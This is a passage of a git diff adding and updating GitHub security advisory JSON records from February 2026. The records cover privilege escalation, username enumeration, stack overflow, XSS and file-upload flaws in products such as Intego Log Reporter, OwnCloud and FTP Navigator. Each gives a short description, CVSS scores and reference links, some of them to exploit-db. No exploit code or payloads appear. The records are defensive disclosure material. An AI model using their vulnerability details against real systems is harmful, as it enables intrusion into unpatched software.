b/advisories/unreviewed/2026/02/GHSA-h5j4-jj3m-xgpg/GHSA-h5j4-jj3m-xgpg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5j4-jj3m-xgpg", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2026-26224" + ], + "details": "Intego Log Reporter, a macOS diagnostic utility bundled with Intego security products that collects system and application logs for support analysis, contains a local privilege escalation vulnerability. A root-executed diagnostic script creates and writes files in /tmp without enforcing secure directory handling, introducing a time-of-check to time-of-use (TOCTOU) race condition. A local unprivileged user can exploit a symlink-based race condition to cause arbitrary file writes to privileged system locations, resulting in privilege escalation to root.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26224" + }, + { + "type": "WEB", + "url": "https://blog.quarkslab.com/intego_lpe_macos_1.html" + }, + { + "type": "WEB", + "url": "https://blog.quarkslab.com/resources/2026-02-10_intego_1/40945709530779-How-to-Use-the-Intego-Log-Reporter.pdf" + }, + { + "type": "WEB", + "url": "https://www.intego.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/intego-log-reporter-toctou-local-privilege-escalation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j2hg-vp99-659f/GHSA-j2hg-vp99-659f.json b/advisories/unreviewed/2026/02/GHSA-j2hg-vp99-659f/GHSA-j2hg-vp99-659f.json new file mode 100644 index 0000000000000..431ad0ac3bf35 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j2hg-vp99-659f/GHSA-j2hg-vp99-659f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2hg-vp99-659f", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25338" + ], + "details": "DokuWiki 2018-04-22b contains a username enumeration vulnerability in its password reset functionality that allows attackers to identify valid user accounts. Attackers can submit different usernames to the password reset endpoint and distinguish between existing and non-existing accounts by analyzing the server's error response messages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25338" + }, + { + "type": "WEB", + "url": "https://download.dokuwiki.org" + }, + { + "type": "WEB", + "url": "https://www.dokuwiki.org/dokuwiki" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47731" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dokuwiki-b-username-enumeration" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-204" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json b/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json new file mode 100644 index 0000000000000..75112a7d5a618 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m2gf-58fp-54j4/GHSA-m2gf-58fp-54j4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m2gf-58fp-54j4", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-13T00:32:51Z", + "aliases": [ + "CVE-2026-1358" + ], + "details": "Airleader Master versions 6.381 and prior allow for file uploads without\n restriction to multiple webpages running maximum privileges. This could\n allow an unauthenticated user to potentially obtain remote code \nexecution on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1358" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-043-10.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-10" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json b/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json index 5dbb3e2b3a123..ae1ed1930fa49 100644 --- a/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json +++ b/advisories/unreviewed/2026/02/GHSA-m668-xfwp-34x6/GHSA-m668-xfwp-34x6.json @@ -34,6 +34,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-434", "CWE-770" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-mg52-9q5r-pwrf/GHSA-mg52-9q5r-pwrf.json b/advisories/unreviewed/2026/02/GHSA-mg52-9q5r-pwrf/GHSA-mg52-9q5r-pwrf.json new file mode 100644 index 0000000000000..e7b8c7031310b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mg52-9q5r-pwrf/GHSA-mg52-9q5r-pwrf.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg52-9q5r-pwrf", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25321" + ], + "details": "FTP Navigator 8.03 contains a stack overflow vulnerability that allows attackers to execute arbitrary code by overwriting Structured Exception Handler (SEH) registers. Attackers can craft a malicious payload that triggers a buffer overflow when pasted into the Custom Command textbox, enabling remote code execution and launching the calculator as proof of concept.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25321" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47794" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47812" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ftp-navigator-stack-overflow-seh" + }, + { + "type": "WEB", + "url": "http://www.internet-soft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json new file mode 100644 index 0000000000000..1e43ff6433e4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5cr-gq3j-93c4", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-13T00:32:51Z", + "aliases": [ + "CVE-2025-70845" + ], + "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) exists in the /setting/ page where the \"intro\" field is not properly sanitized or escaped.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70845" + }, + { + "type": "WEB", + "url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70845" + }, + { + "type": "WEB", + "url": "https://github.com/lty628/aidigu" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json index a5046795fef0a..f1b4fbd1723f2 100644 --- a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json +++ b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pmfg-h9xp-96jh", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20675" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted image may lead to disclosure of user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json b/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json index 9437c2b5b8f04..8927f9ccb0619 100644 --- a/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json +++ b/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qq3h-f6g7-3484", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-64074" ], "details": "A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json b/advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json new file mode 100644 index 0000000000000..728de65360a8f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r63r-4348-x8g9/GHSA-r63r-4348-x8g9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r63r-4348-x8g9", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25324" + ], + "details": "RICOH Web Image Monitor 1.09 contains an HTML injection vulnerability in the address configuration CGI script that allows attackers to inject malicious HTML code. Attackers can exploit the entryNameIn and entryDisplayNameIn parameters to insert arbitrary HTML content, potentially enabling cross-site scripting attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25324" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47827" + }, + { + "type": "WEB", + "url": "https://www.ricoh.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ricoh-web-image-monitor-html-injection" + }, + { + "type": "WEB", + "url": "http://support-download.com/services/device/webhlp/nb/gen/v140cc1/en/p_top010.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json index ac25a86510244..42de4ac210f90 100644 --- a/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json +++ b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-532" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json b/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json index b9f067faefba5..b20a3b82ec1ca 100644 --- a/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json +++ b/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rfq8-v234-58w4", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20627" ], "details": "An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in watchOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json b/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json index cdb3c1d3a28f3..2345547e87bb8 100644 --- a/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json +++ b/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rr27-5cg7-jpp5", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-13T00:32:51Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2024-26478" ], "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the /api/users endpoint.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T20:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json b/advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json new file mode 100644 index 0000000000000..dd0c8f413d04f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrc9-5ccp-4p2x", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25318" + ], + "details": "AVS Audio Converter 9.1.2.600 contains a stack overflow vulnerability that allows attackers to execute arbitrary code by manipulating the output folder text input. Attackers can craft a malicious payload that overwrites stack memory and triggers a bind shell on port 9999 when the 'Browse' button is clicked.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25318" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47788" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47810" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avs-audio-converter-stack-overflow" + }, + { + "type": "WEB", + "url": "http://www.avs4you.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json b/advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json new file mode 100644 index 0000000000000..555d208a7ccf1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxgx-jjvj-9w6v", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25323" + ], + "details": "Heatmiser Netmonitor v3.03 contains an HTML injection vulnerability in the outputSetup.htm page that allows attackers to inject malicious HTML code through the outputtitle parameter. Attackers can craft specially formatted POST requests to the outputtitle parameter to execute arbitrary HTML and potentially manipulate the web interface's displayed content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25323" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190724160628/https://www.heatmiser.com/en" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47828" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/heatmiser-netmonitor-html-injection" + }, + { + "type": "WEB", + "url": "https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json b/advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json new file mode 100644 index 0000000000000..fc106bac900ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3jv-jh9h-w9c8", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25340" + ], + "details": "SpotAuditor 5.3.2 contains a denial of service vulnerability in its Base64 decryption feature that allows attackers to crash the application by supplying an oversized buffer. Attackers can generate a malformed input file with 2000 repeated characters to trigger an application crash when pasted into the Base64 Encrypted Password field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25340" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47719" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotauditor-base-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json b/advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json new file mode 100644 index 0000000000000..8a0ac51f99a9b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5m9-phxh-m6wj", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25337" + ], + "details": "OwnCloud 8.1.8 contains a username enumeration vulnerability that allows remote attackers to discover user accounts by manipulating the share.php endpoint. Attackers can send crafted GET requests to /index.php/core/ajax/share.php with a wildcard search parameter to retrieve comprehensive user information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25337" + }, + { + "type": "WEB", + "url": "https://ftp.icm.edu.pl/packages/owncloud" + }, + { + "type": "WEB", + "url": "https://owncloud.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47745" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/owncloud-username-disclosure" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json b/advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json new file mode 100644 index 0000000000000..6b131e12bd6de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp56-39mv-f923", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25332" + ], + "details": "FTP Commander Pro 8.03 contains a local stack overflow vulnerability that allows attackers to execute arbitrary code by overwriting the EIP register through a custom command input. Attackers can craft a malicious payload of 4108 bytes to overwrite memory and execute shellcode, demonstrating remote code execution potential.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25332" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/37810" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47775" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ftp-commander-pro-local-stack-overflow" + }, + { + "type": "WEB", + "url": "http://www.internet-soft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json b/advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json new file mode 100644 index 0000000000000..d63688c8e22b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w785-qrg6-5h74", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25336" + ], + "details": "SpotAuditor 5.3.2 contains a local buffer overflow vulnerability in the Base64 Encrypted Password tool that allows attackers to execute arbitrary code by crafting a malicious payload. Attackers can generate a specially crafted Base64 encoded payload to trigger a Structured Exception Handler (SEH) overwrite and execute shellcode on the vulnerable system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + 